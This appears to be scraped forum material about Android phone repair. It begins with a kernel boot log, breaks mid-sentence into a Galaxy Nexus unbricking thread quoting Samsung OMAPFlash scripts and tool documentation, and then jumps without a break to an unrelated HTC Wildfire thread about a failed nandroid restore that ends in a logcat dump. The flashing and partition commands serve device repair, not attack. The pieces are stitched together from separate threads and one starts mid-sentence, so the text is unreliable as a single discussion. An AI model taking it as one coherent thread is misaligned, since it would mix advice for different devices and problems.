[ 11.732147] omap_hsi omap_hsi.0: hsi_write_cancel ch 0
[ 11.756225] omap_hsi omap_hsi.0: __hsi_write_cancel : -61
[ 11.762268] omap_hsi omap_hsi.0: hsi_read_cancel ch 0
[ 11.767791] omap_hsi omap_hsi.0: __hsi_read_cancel : -125
[ 11.773620] omap_hsi omap_hsi.0: __hsi_write_cancel : -61
[ 11.779174] omap_hsi omap_hsi.0: __hsi_read_cancel : -61
[ 11.785552] [MODEM_IF] misc_open : umts_ipc0
[ 11.790954] omap_hsi omap_hsi.0: Entering RX wakeup in 4 wires mode
[ 11.798675] [MODEM_IF] misc_open : umts_rfs0
[ 11.829528] [MODEM_IF] PA EVENT : reset =1, pa=1
[ 11.834228] [MODEM_IF] umts_ipc0 state changed: ONLINE
[ 14.545074] drivers/misc/inv_mpu/mldl_cfg.c|inv_mpu_get_slave_config|1792 returning 4
[ 26.044372] request_suspend_state: wakeup (3->0) at 26030029299 (2012-05-13 00:25:34.359069826 UTC)
[ 26.622772] acc_open
[ 26.625122] acc_release
[ 26.670013]
[ 26.670043] Dongle Host Driver, version 5.90.125.94
[ 26.670043] Compiled in drivers/net/wireless/bcmdhd on Nov 21 2011 at 19:05:54
[ 26.684082] wl_android_wifi_on in
[ 26.687622] wifi_set_power = 1
[ 26.971282] =========== WLAN going back to live ========
[ 26.977600] sdio_reset_comm():
[ 27.066314] dhdsdio_write_vars: Download, Upload and compare of NVRAM succeeded.
[ 27.228179] wifi_get_mac_addr
[ 27.232513] Firmware up: op_mode=1, Broadcom Dongle Host Driver mac=a0:0b:ba:e6:73:ae
[ 27.344390] dhd_rx_frame: net device is NOT registered yet. drop packet
[ 27.351531] dhd_rx_frame: net device is NOT registered yet. drop packet
[ 27.360076] Firmware version = wl0: Oct 5 2011 14:41:12 version 5.90.125.94
[ 28.639709] wl_bss_connect_done succeeded status=(0x9)
[ 28.732391] wl_bss_connect_done succeeded status=(0x11)
[ 29.166564] nfc_power_apply ON
[ 29.201965] nfc_power_apply OFF
[ 29.272308] nfc_power_apply ON
[ 35.672241] rpmsg_omx rpmsg-omx1: local addr assigned: 0x401
[ 35.682067] omap-iommu omap-iommu.0: iommu_get: ducati qos_request
[ 35.703735] omap_hwmod: ipu: failed to hardreset
[ 35.713470] omap-iommu omap-iommu.0: ducati: version 2.1
[ 35.826934] rpmsg_omx rpmsg6: conn rsp: status 0 addr 101
[ 35.975158] rpmsg_omx rpmsg-omx1: Disconnecting from OMX service at 101
[ 39.279998] wlan0: no IPv6 routers present
[ 44.895355] init: untracked pid 1113 exited
[ 44.905731] init: untracked pid 1119 exited
[ 44.918914] init: untracked pid 1123 exited
[ 44.923248] init: untracked pid 1124 exited
[ 44.927612] init: untracked pid 1117 exited
[ 44.932067] init: untracked pid 1120 exited
[ 54.283905] max17040 4-0036: online = 1 vcell = 3788750 soc = 48 status = 3 health = 1 temp = 350 charger status = 0
[ 61.938812] request_suspend_state: sleep (0->3) at 61924468996 (2012-05-13 00:26:10.253540041 UTC)
[ 61.959869] dhd_set_suspend: force extra Suspend setting
first. The device checks if it's too hot or too cold to boot via IROM software (internal read only memory). After that it begins initialization. The IROM version is displayed. Then the device type..
The OMAP processor in the Galaxy Nexus is a HS (High Security) processor, as opposed to GP (General Purpose) processor. This means the first bootloader (AKA MLO or X-Loader) is a signed binary which is e-fused to the device.
I've seen in the past on similar Hummingbird processors that only the first 1K is checked for speed because hashing it takes a little bit of time. This may or may not be the case with this particular device. We will see.
Anyway.. There's a possiblity we can find an MLO which is already presigned somewhere on the Internet. We need whatever they use at Samsung which provides the initial firmware load to a device without any firmware on it.
Here is a relevant page: http://omapedia.org/wiki/Bootloader_Project
Code:
If you are using an HS (High Security) OMAP device, an extra step is required. First, build x-load.bin using the steps above. Then, download the MShield signing tool and use the commands below. Contact your TI representative to get access to this tool.
In order to get the firmware onto the device in the first place, this bootloader must exist. We need a copy of it. Once we have this bootloader, we can revive Galaxy Nexus devices.
You may have seen this already, but just in case - this seems to be a bootloader of some kind. I couldn't get it to work with my bricked SGN, but it may be of some use to the unbricking effort.
Can't post link, so search for "Unbrick dead Samsung GT-i9250 Galaxy Nexus 32GB".
Best of luck!
The user above is referring to this link, I think:
http://forum.xda-developers.com/showthread.php?t=1640443
The user there shares a .zip file that supposedly is able to unbrick a 32gb GNex using some samsung software. It calls OMAPFlash.exe with a bunch of parameters. I don't know whether it will be useful or not, but it's a start.
The batch file that the post above ^ asks the users to run is this:
Code:
::::
:: Copyright (C) 2010-2011, Samsung Electronics, Co., Ltd. All Rights Reserved.
:: Written by System S/W Group, S/W Platform R&D Team,
:: Mobile Communication Division.
::::
::::
:: Project Name : Proxima GED
::
:: Project Description :
::
:: Comments : tabstop = 8, shiftwidth = 8, noexpandtab
::::
::::
:: File Name : omap4460_tuna_hs.bat
::
:: File Description :
::
:: Author : System Platform 2
:: Dept : System S/W Group (S/W Platform R&D Team)
:: Created : 17/Aug/2011
:: Version : Baby-Raccoon
::::
:__loop
@OMAPFlash.exe -v @Targets\Projects\tuna\omap4460_tuna_hs_pro.txt
@PAUSE
GOTO __loop
Seeing the text file path, I went and looked. Here's what I found:
Code:
##
# Copyright (C) 2010-2011, Samsung Electronics, Co., Ltd. All Rights Reserved.
# Written by System S/W Group, S/W Platform R&D Team,
# Mobile Communication Division.
##
##
# Project Name : Proxima GED
#
# Project Description :
#
# Comments : tabstop = 8, shiftwidth = 8, noexpandtab
##
##
# File Name : omap4460_tuna_hs.txt
#
# File Description :
#
# Author : System Platform 2
# Dept : System S/W Group (S/W Platform R&D Team)
# Created : 17/Aug/2011
# Version : Baby-Raccoon
##
-omap 4
-t 36000 -p OMAP4460_TUNA_8G_HS_PRO -2
#chip_download [email protected] Targets\Projects\tuna\MBR.bin
chip_download [email protected] Targets\Projects\tuna\MLO_4460_HS_PRO
chip_download [email protected] Targets\Projects\tuna\sbl.img
command cold_sw_reset
So it appears that the software writes the files MLO_4460_HS_PRO and sbl.img to different parts of the internal memory.
Any success for the device driver? In the documents above, they say you should use the FTDI VCP (Virtual COM Port) drivers... But included in the package above, there is a driver in the ../usb_drv_windows directory, for exactly the TI driver you mentioned:
Code:
%USB_OMAP4460% = USB_Install, USB\VID_0451&PID_d010
For lazy reference:
Code:
[SIZE=2]-- Usage --
OMAPFlash Host is a command-line based application. It is currently available
for Windows XP only and will run in a Windows command shell. The application can
take commands directly from the command line or via a script file (a more useful
approach). The syntax for calling the tool is:
[B]omapflash [ <option> ] <command>[/B]
or, if a script file is used: omapflash @<file>
-- Options --
The tool has a number of options that can be used to control its overall
behavior.
[B]-com <port number> [/B]By default OMAPFlash will try to communicate with the
target platform using a USB serial link. This option will force OMAPFlash to
use a UART for serial communication and specify the host side COM-port to use.
-t <timeout> By default the timeout for communication on the serial link is 5
seconds. This option allows control of the timeout value by specifying another
timeout value in seconds.
[B]-p <platform>[/B] This option is required by OMAPFlash and specifies the platform
for which the download is to take place. The platform specified is a name tag
that allows OMAPFlash to identify the correct second loader to use. The tag
typically identifies the platform type and the memory used with the OMAP
device present on the platform (“e.g. SDP_MDDR_HYNIX_4G). The tag is used to
look up the second loader in a configuration file (omapflash2nd.txt) in
combination with an OMAP device identifier received from the platform during
peripheral boot.
[B]-omap <version> [/B]This option is required by OMAPFlash if a peripheral boot
sequence is used to transfer a second loader to a target platform. The option
specifies the OMAP generation used on the platform – without this option set,
OMAPFlash will be unable to determine how to correctly perform the peripheral
boot sequence necessary for transfer of the second loader to the platform. The
version number is a single digit integer (e.g. ‘3’ for an OMAP3xxx based
platform or ‘4’ for an OMAP4xxx based platform).
[B]-2[/B] This option controls whether OMAPFlash will try to use the ROM code
peripheral boot sequence to transfer a second loader to internal RAM before
doing anything else. This option will be required for most scenarios where
OMAPFlash is used but can be left out if OMAPFlash Host is interacting with a
second loader already running on a target platform.
[B]-v[/B] The ‘-v’ option controls whether OMAPFlash Host will run in verbose mode.
If set, more information will be shown during the execution of the flashing
sequence. Note that this option should be set in order to see the target
platform response to certain commands (e.g. ‘chips’).
-- Commands --
Commands are executed on the target platform. Any command is prefixed by the
keyword ‘command’ and anything following this keyword will be passed directly to
OMAPFlash Second by OMAPFlash Host without interpretation or modification.
Typically the ‘verbose’ option should be used with commands in order to ensure
that information returned from the platform will be shown on the console.
branch <device> <offset>
This command will cause OMAPFlash Second to make an
unconditional branch to a memory mapped address. The device will typically be
the SDRAM handled by the OMAP SDRAM controller in this case, and the offset
typically zero. The device ID must be one known by OMAPFlash Second and the
offset an integer within the address offset range valid for the device.
peek32 <address> Get the register value of the register with the given
address.
poke32 <address> <value> Modify the register at the given address to the given
value
peekpoke32 <address> <value> <mask> Modify the register at the given address
with the given value and mask
-- Flashing --
OMAPFlash Host is able to handle three basic procedures for accessing memory
devices through the OMAPFlash Second loader. These procedures are used to erase
memory devices, transfer a binary file to a device or upload the device content
to a binary file. In all cases, parameter values specifying sizes or offsets are
hexadecimal.
[B]chip_erase <device>[@offset] <size> [/B]
This procedure is used to erase the
content of a device, either for the whole device or for part of its address
range. The ‘device’ identifier is a string matching one of the devices
available on the platform as listed from the ‘chips’ command – in other words,
a device known to OMAPFlash Second for the particular platform used (SDRAM is
not a valid choice). If an ‘offset’ is used, the device erasure will start at
the offset specified. The offset will need to be compatible with the memory
structure of the device in question – e.g. if the device has a block size of
40000h bytes, the offset will need to be a multiple of the block size. The
‘size’ specifies the number of bytes to erase – a value of zero has the
special meaning of “to the end of the device”, either starting at offset zero
or at the specified ‘offset’ value, and can be used to erase the entire
device. Note that the typical erase functionality of a memory device is based
on the erasure of blocks of memory – it may not make sense to ask for erasure
of a size that is not a multiple of the block size of the device.
[B]chip_download <device>[@offset] <file> [/B]
In order to transfer a binary file to a
device on the platform this procedure is used. The ‘device’ identifier is a
string matching one of the devices available on the platform. If an ‘offset’
is specified the binary will be downloaded to the device starting at the
offset address specified. Using an offset should be done with some caution,
since the meaning of the offset value may be unclear for some device types
(e.g. for a NAND device the offset will be used without consideration of bad
blocks present in the memory space preceding the offset address). The file to
be downloaded is specified by the ‘file’ parameter and must be a raw image.
[B]chip_upload <device>[@offset] <size> <file> [/B]
In order to upload the content of
a memory device this procedure is used. The ‘device’ identifier is a string
matching one of the devices available on the platform. If an ‘offset’ is
specified content will be uploaded from the device starting at the offset
address specified. As for the ‘chip_download’ procedure the use of an offset
should be done with caution. The ‘size’ parameter specifies the number of
bytes to upload and the ‘file’ parameter the file to which the uploaded data
will be saved. Note that due to some limitations on the serial link, upload of
data will be considerably slower than download.
[/SIZE]
First things first. I recieved a PM from user itsalllgood with information regarding this topic. Here's the whole PM, copied and pasted:
itsalllgood said:
Dear fred,
Sorry to bother you...I wanted to post here but iam not allowed.. I am a computer engineer from montreal current living abroad..I had gnex that died and did a lot of work to try to get it back..to summ it all the omapidia project add TI site will get the full picture. the tool you linked is based on TI 1.6 omap flash.. i will keep it short... the link below will summ my work and please copy past it if you think its worth it..thanks in advance..
http://forum.xda-developers.com/showthread.php?p=26334564&posted=1#post26334564
Click to expand...
Click to collapse
^^ Somehow your link got messed up, but I think its this one.
Is it possible to hardware prevent a device like Samsung Galaxy S2 to go fastboot / odin mode when powering on but still be able to load the operating system?
Because even although I have a password set on the device, if it is stolen anyone can connect it to fastboot with power+voldown+menu and restore it to defaults. For example filling that corresponding partition with zeros will prevent from entering odin mode unless you boot into the operating system and with dd restore the partition.
First of all, that's off-topic. But I'll provide a speculative answer nonetheless.
I would think that you would be able to prevent a device from reaching recovery/fastboot/odin-download-mode, but it would have a big disadvantage, which is that if you are not able to boot into the OS somehow, you would have an unusable device. Although a device like the Galaxy Nexus, if stolen, could have its data retrieved by potentially using Odin and/or fastboot to reset the password, removing these failsafes would mean that you have a higher chance of bricking. Besides, that's what remote wipe apps (and other stolen-phone tools) are for. Check out Avast! if you don't have an antivirus/stolen-phone toolkit.
I'm by no means an expert here, but that's just my two cents.
EDIT: By the way, could we have someone (like AdamOutler) look at what we've got in this thread so far to see if the MLO file that we found is what's needed (as mentioned by Adam in the first couple posts)?
It's just that I don't either know the exact boot sequence of the SGS2 GT-I9100 nor the partitions interdependence (for example say that the boot partition needs the recovery or the sbl), I coudn't zero that partition because is a dependence.
What I woukd like to know if is possible:
- Backup all partitions.
- Zero, from android with dd, all partitions that allow anyone to enter odin/fastboot/clockworkmod/recovery so, if I lose the device, no one can make a odin backup or reset my device, unless you restore the partitions from the android or you use a hardware JTAG.
- Even the previous done, the phone must be able to normal boot into operating system.
I have a gut feeling that that's not possible. For recovery/odin modes, it may be possible due to them not really being directly involved in the boot process. However, for fastboot, I think it's part of the bootloader itself and therefore cannot be disabled using simple commands without also disabling the phone's booting process. For example, if you have the proper drivers installed on your computer, a Galaxy Nexus that's booting into Android will show up the same device as if you're connected via Fastboot. Unless someone can alter the source and recompile a bootloader with disabled fastboot, I don't think what you stated above is completely possible.
FredFS456 said:
I have a gut feeling that that's not possible. For recovery/odin modes, it may be possible due to them not really being directly involved in the boot process. However, for fastboot, I think it's part of the bootloader itself and therefore cannot be disabled using simple commands without also disabling the phone's booting process. For example, if you have the proper drivers installed on your computer, a Galaxy Nexus that's booting into Android will show up the same device as if you're connected via Fastboot. Unless someone can alter the source and recompile a bootloader with disabled fastboot, I don't think what you stated above is completely possible.
Click to expand...
Click to collapse
I think what I need could be done with a locked bootloader. As far as I know, the Samsung Galaxy S2 comes with an unlocked bootloader (causing the security flaw) while other like Samsung Galaxy Nexus come with a locked one: that means on stock devices, with use pattern or password and usb debugging disabled, there is no way someway can access you data even if not encryption is set.
Anyone can clarify things on this?
Bump, and back on topic.
Any developments here?
Yes. http://forum.xda-developers.com/showthread.php?t=1640443
it's done.
AdamOutler said:
Yes. http://forum.xda-developers.com/showthread.php?t=1640443
it's done.
Click to expand...
Click to collapse
Does anyone know HOW it's done??
EDIT: Actually the accompanying documentation explains quite well!
@Adam: Do you think we could tweak these drivers etc. for other devices not using OMAP?
(It seem that many protocols are standard, inducing the serial (UART) over USB FTDI-drivers...)
E:V:A said:
Does anyone know HOW it's done??
EDIT: Actually the accompanying documentation explains quite well!
@Adam: Do you think we could tweak these drivers etc. for other devices not using OMAP?
(It seem that many protocols are standard, inducing the serial (UART) over USB FTDI-drivers...)
Click to expand...
Click to collapse
It works just like UBM... but stock.
No. I dont think we can do that. Its an omap tool that requires bootmodes to be proper to work on omap. It can be applied to other properly configured omap devices.
EDIT : The issue has been resolved.
----------------------------------------------------
Hi guys,sorry for starting a new thread.I've been searching XDA forum and Googling for the solution for 3 days but haven’t found one. I am facing very weird and annoying problem and in desperate need of help.
My Wildfire was working fine on CM 7.2 Stable .Few days back I performed the following things :
1).To resolve the wireless related issues I reflashed Radio (3.35.20.10)
2)Flashed latest Kernel (SympKernV4.5) to give it a try ,was not satisfied and reflashed the previous Kernel (SympKernV4.1)
After that my phone got stuck on the CM boot screen.
I have tried following things :
1)Wiped everything and took nandroid backup without any problem.Everything went well but at the end same boot screen.Yes,I have got two partitions in SDCard FAT32 and ext3.And obviously I used the same version of CWM to restore as I did when creating the backup.
2)Tried the same things 3-4 times to no avail.
3)Ran RUU (RUU_Buzz_HTC_WWE_1.25.405.1_Radio_13.45.55.24_3.35.15.31_release_142189_signed).Downgraded and rooted using unrevoked once again.It was booting fine.Flashed recovery 5.0.2.8.Took nandroid backup everything went perfectly without any Error but when I did the reboot,same CM boot screen.
4.Flashed RemPuzzle_2.81-full and the boot was fine.But again when I tried to restore nandroid backup,got stuck on the same boot screen.I have waited for 5 hours.
5)Tried some other RUUs but the result is still the same.Phone boots perfectly when I flash the RUU. After downgrading and rooting when I try to restore the nandroid backup,it works fine till the end without any error but when I reboot the system it stucks on boot screen.
6) Followed what eventcom has mentioned in http://forum.xda-developers.com/showthread.php?t=1401784&page=2 .Booting was okay but again stuck on boot screen after nandroid restore.
7)Went back to CWM 2.5.0.7 and reflashed the CWM 5.0.2.8.
8.Removed SDCard and SIM before reboot.
9)Don’t think the problem is related to MTD partition as I have formatted all the 3 partitions(/cache,/data and /system).
10)I don’t think the Nandroid Backup has got corrupted coz Nandroid Restore was successful 4 days back before that Radio and Kernel thing moreover I have the backup file saved in PC and I copy the file to SDCard before every new Nandroid restore operation.
Any clues ?
Your help will be much appreciated.Thanks for your time.
Regards
Anybody ?
Hi pal, sorry for my delayed response. Xmas is nuts here :/ ok what I would like you to try is a clean install of cm7 stable and once that's installed go to the play store. The app I want you to get is called nandroid manager, install it and allow it to check your back up. I want to see if it will restore from it or if it will find it corrupt. All going well it will resotre your apps and data and we cam go from there
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
The app I want you to get is called nandroid manager, install it and allow it to check your back up. I want to see if it will restore from it or if it will find it corrupt. All going well it will resotre your apps and data and we cam go from there
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
Click to expand...
Click to collapse
Hi mate,thanks for your reply.I really appreciate it.There are somethings I need to ask.
1.Right now I am on CWM 2.5.0.1,so before restoring the backup taken by CWM 5.0.2.8 I will have to flash CWM 5.0.2.8 first.Right ?
2.AFAIK,Nandroid Backup is stored in the "backup" folder
Code:
clockworkmod\backup
Right ?
There is another folder "download"
Code:
clockworkmod\download
and two files
Code:
.nomedia
and
Code:
.settings
inside "clockworkmod" folder.
What is the role of "download" folder and those two files ?Do they have anything to do with the nandroid backup ?If I want to restore any nandroid backup,do I also need to move that "download" folder and those two files to "clockworkmod" folder or only moving the backup inside "backup" folder will do the job ?
optimusodd said:
Hi mate,thanks for your reply.I really appreciate it.There are somethings I need to ask.
1.Right now I am on CWM 2.5.0.1,so before restoring the backup taken by CWM 5.0.2.8 I will have to flash CWM 5.0.2.8 first.Right ?
2.AFAIK,Nandroid Backup is stored in the "backup" folder
Code:
clockworkmod\backup
Right ?
There is another folder "download"
Code:
clockworkmod\download
and two files
Code:
.nomedia
and
Code:
.settings
inside "clockworkmod" folder.
What is the role of "download" folder and those two files ?Do they have anything to do with the nandroid backup ?If I want to restore any nandroid backup,do I also need to move that "download" folder and those two files to "clockworkmod" folder or only moving the backup inside "backup" folder will do the job ?
Click to expand...
Click to collapse
If you made the back up with cwm 5 you will need cwm 5 pal. The difference between those two recovery is a scripting change, going from amend to edify I believe. So you need version 5 if that's what the back up was made with
Second your back ups are indeed within the cwm/backup folder. The other folder is for if you use the Rom manager application ( which is made by the same gentleman who makes and maintains cwm recovery) the setting file tells the app your default app settings and preferences and the .nomedia is a dummy file. When android apps like music players and picture viewers ect scan the sdcard for content they also look for the .nomedia file, which tells the app simply that there is no media in the folder and that it does not need to scan it should you want to make one simply create a .txt file and rename it to .nomedia and android apps will ignore the folder when looking for media
So should you want to back up your backups as it were simply copy the whole backup folder from your sd card to your pc, job done
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
The other folder is for if you use the Rom manager application ( which is made by the same gentleman who makes and maintains cwm recovery) the setting file tells the app your default app settings and preferences and the .nomedia is a dummy file. When android apps like music players and picture viewers ect scan the sdcard for content they also look for the .nomedia file, which tells the app simply that there is no media in the folder and that it does not need to scan it should you want to make one simply create a .txt file and rename it to .nomedia and android apps will ignore the folder when looking for media
Click to expand...
Click to collapse
Ah okay,thanks for the explanation.
Okay I used nandroid manager to restore the backup and evrything went well till the end.No error.Nothing.After the completion it rebooted the device and it again got stuck on bootscreen.It has been stuck on bootscreen for last 20 mints.I don't understand why
optimusodd said:
Ah okay,thanks for the explanation.
Okay I used nandroid manager to restore the backup and evrything went well till the end.No error.Nothing.After the completion it rebooted the device and it again got stuck on bootscreen.It has been stuck on bootscreen for last 20 mints.I don't understand why
Click to expand...
Click to collapse
Hmmmm. That's very strange. Do you know how to do a logcat to a text file? If so do one and capture it at boot and we will see if it gives us an error
Sent from my Nexus 7 using Tapatalk 4
heavy_metal_man said:
Hmmmm. That's very strange. Do you know how to do a logcat to a text file? If so do one and capture it at boot and we will see if it gives us an error Sent from my Nexus 7 using Tapatalk 4
Click to expand...
Click to collapse
Okay I had taken a nandroid backup using CWM 5.0.2.8 to be on the safe side before trying to restore the backup via Nandroid manager.So when the restore process via Nandroid manager ended up again as stucked on bootscreen I wiped everything and took the nandroid restore and it was successful.WTH is going on.Seriously,I am clueless
Okay,capture it using adb or CatLog ?
optimusodd said:
Okay I had taken a nandroid backup using CWM 5.0.2.8 to be on the safe side before trying to restore the backup via Nandroid manager.So when the restore process via Nandroid manager ended up again as stucked on bootscreen I wiped everything and took the nandroid restore and it was successful.WTH is going on.Seriously,I am clueless
Click to expand...
Click to collapse
OK so now you have the rom installed with the correct data restored? That's a plus not sure how this has came about though
Sent from my Nexus 7 using Tapatalk 4
heavy_metal_man said:
OK so now you have the rom installed with the correct data restored? That's a plus not sure how this has came about though Sent from my Nexus 7 using Tapatalk 4
Click to expand...
Click to collapse
Nope not the one I want to restore.It's the restoration of the nandroid backup taken of clean CM 7.2 i.e CM7.2+Gapps+Nandroid Manager.
Okay,I do a logcat.
................................EDITED..........................
Hi,I have sent you the logcats.
Here is one of the logcats
HTML:
--------- beginning of /dev/log/main
[ 12-15 19:32:52.341 100:0x64 I/cm ]
Welcome to Android 2.3.7 / CyanogenMod-7.2.0-buzz
[ 12-15 19:32:52.351 101:0x65 I/cm ]
_
[ 12-15 19:32:52.371 102:0x66 I/cm ]
__ __ _ ___ _ _ __ ___ __ _ _ _ _ __ __))
[ 12-15 19:32:52.391 103:0x67 I/cm ]
((_ \(/'((_( ((\( ((_)((_( (('((\( ((`1( ((_)((_(
[ 12-15 19:32:52.401 104:0x68 I/cm ]
)) _))
[ 12-15 19:32:52.421 105:0x69 I/cm ]
[ 12-15 19:32:52.651 119:0x77 I/mountsd ]
Checking filesystems..
[ 12-15 19:32:52.771 95:0x5f I/run-parts ]
e2fsck 1.41.12 (17-May-2010)
[ 12-15 19:32:52.801 95:0x5f I/run-parts ]
/dev/block/mmcblk0p2: clean, 84/65808 files, 53844/262912 blocks
[ 12-15 19:32:52.972 134:0x86 I/mountsd ]
/sd-ext successfully mounted
[ 12-15 19:32:53.602 169:0xa9 D/AK8973 ]
AK8973 daemon 1.3.4 Start
(Library version : 1.2.1.620)
--------- beginning of /dev/log/system
[ 12-15 19:32:53.832 160:0xa0 I/Vold ]
Vold 2.1 (the revenge) firing up
[ 12-15 19:32:53.872 160:0xa0 D/Vold ]
Volume sdcard state changing -1 (Initializing) -> 0 (No-Media)
[ 12-15 19:32:53.993 160:0xb5 D/Vold ]
USB connected
[ 12-15 19:32:54.003 160:0xb5 D/Vold ]
Volume sdcard state changing 0 (No-Media) -> 2 (Pending)
[ 12-15 19:32:54.033 160:0xb5 D/Vold ]
Volume sdcard state changing 2 (Pending) -> 1 (Idle-Unmounted)
[ 12-15 19:32:54.093 161:0xa1 I/Netd ]
Netd 1.0 starting
[ 12-15 19:32:54.213 160:0xb5 D/Vold ]
USB connected
[ 12-15 19:32:54.423 162:0xa2 I/DEBUG ]
debuggerd: Jun 15 2012 12:13:45
[ 12-15 19:32:55.744 164:0xa4 D/AndroidRuntime ]
>>>>>> AndroidRuntime START com.android.internal.os.ZygoteInit <<<<<<
[ 12-15 19:32:55.744 164:0xa4 I/AndroidRuntime ]
Heap size: -Xmx32m
[ 12-15 19:32:55.744 164:0xa4 D/AndroidRuntime ]
CheckJNI is OFF
[ 12-15 19:32:56.285 165:0xa5 I/ ]
ServiceManager: 0xad50
[ 12-15 19:32:56.305 165:0xa5 I/HTC Acoustic ]
libhtc_acoustic.so version 1.0.1.4.
[ 12-15 19:32:56.305 165:0xa5 E/HTC Acoustic ]
Fail to open /system/etc/AudioPara_ALL.csv -1.
[ 12-15 19:32:56.305 165:0xa5 I/HTC Acoustic ]
open /system/etc/AudioPara4.csv success.
[ 12-15 19:32:56.335 165:0xa5 I/HTC Acoustic ]
acoustic table version: Buzz_Generic_20100804
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
read_audio_para_from_file success.
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
get_audpp_filter
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
open /system/etc/AudioFilter.csv success.
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
ADRC Filter ADRC FLAG = ffff.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP THRESHOLD = 2550.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP SLOPE = b333.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP RMS TIME = 106.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP ATTACK[0] = 7f7d.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP ATTACK[1] = 3096.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP RELEASE[0] = 7ff7.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP RELEASE[1] = 4356.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP DELAY = 16.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
EQ flag = ffff.
[ 12-15 19:32:56.395 165:0xa5 I/HTC Acoustic ]
get_audpre_filter
[ 12-15 19:32:56.395 165:0xa5 I/HTC Acoustic ]
open /system/etc/AudioPreProcess.csv success.
[ 12-15 19:32:56.395 165:0xa5 D/AudioHardwareMSM72XX ]
mNumSndEndpoints = 80
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH HANDSET
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH SPEAKER
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH HEADSET
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH BT
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH CARKIT
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH TTY_FULL
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH TTY_VCO
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH TTY_HCO
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH NO_MIC_HEADSET
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH FM_HEADSET
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH HEADSET_AND_SPEAKER
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH FM_SPEAKER
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH BT_EC_OFF
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH CURRENT
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareInterface ]
setMode(NORMAL)
[ 12-15 19:32:56.415 165:0xa5 I/AudioHardwareMSM72XX ]
Set master volume to 5.
[ 12-15 19:32:56.435 165:0xa5 I/CameraService ]
CameraService started (pid=165)
[ 12-15 19:32:56.445 165:0xd5 I/AudioFlinger ]
AudioFlinger's thread 0xf2e0 ready to run
[ 12-15 19:32:56.445 165:0xd4 D/AudioFlinger ]
setParameters(): io 1, keyvalue routing=2, tid 212, calling tid 165
[ 12-15 19:32:56.455 165:0xd5 I/AudioHardwareMSM72XX ]
Routing audio to Speakerphone
[ 12-15 19:32:56.455 165:0xd5 D/HTC Acoustic ]
msm72xx_enable_audpp: 0x0007
[ 12-15 19:32:56.465 165:0xd4 D/AudioHardwareMSM72XX ]
setVoiceVolume(1.000000)
[ 12-15 19:32:56.465 165:0xd4 I/AudioHardwareMSM72XX ]
Setting in-call volume to 5 (available range is 0 to 5)
[ 12-15 19:32:57.836 164:0xa4 I/SamplingProfilerIntegration ]
Profiler is disabled.
[ 12-15 19:32:57.906 164:0xa4 I/Zygote ]
Preloading classes...
[ 12-15 19:32:57.916 164:0xa4 E/Zygote ]
setreuid() failed. errno: 2
[ 12-15 19:32:57.926 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed 48K, 77% free 239K/1024K, external 0K/0K, paused 11ms
[ 12-15 19:32:58.137 164:0xa4 I/bluetooth_ScoSocket.cpp ]
Entry name = MY-CAR ScoTypes = 0x7f
[ 12-15 19:32:58.137 164:0xa4 I/bluetooth_ScoSocket.cpp ]
Entry name = Motorola HF850 ScoTypes = 0x7
[ 12-15 19:33:00.199 164:0xa4 D/szipinf ]
Initializing inflate state
[ 12-15 19:33:04.683 164:0xa4 D/dalvikvm ]
GC_FOR_MALLOC freed 2913K, 57% free 2209K/5123K, external 0K/0K, paused 99ms
[ 12-15 19:33:06.375 164:0xa4 D/dalvikvm ]
GC_FOR_MALLOC freed 2631K, 52% free 2488K/5123K, external 0K/0K, paused 93ms
[ 12-15 19:33:10.529 164:0xa4 I/Zygote ]
...preloaded 1829 classes in 12629ms.
[ 12-15 19:33:10.529 164:0xa4 D/Zygote ]
setreuid() error ignored, same uid.
[ 12-15 19:33:10.619 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed 891K, 48% free 2685K/5123K, external 0K/0K, paused 82ms
[ 12-15 19:33:10.619 164:0xa4 I/Zygote ]
Preload resources disabled, skipped.
[ 12-15 19:33:10.689 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed 25K, 49% free 2660K/5123K, external 0K/0K, paused 67ms
[ 12-15 19:33:10.759 164:0xa4 D/dalvikvm ]
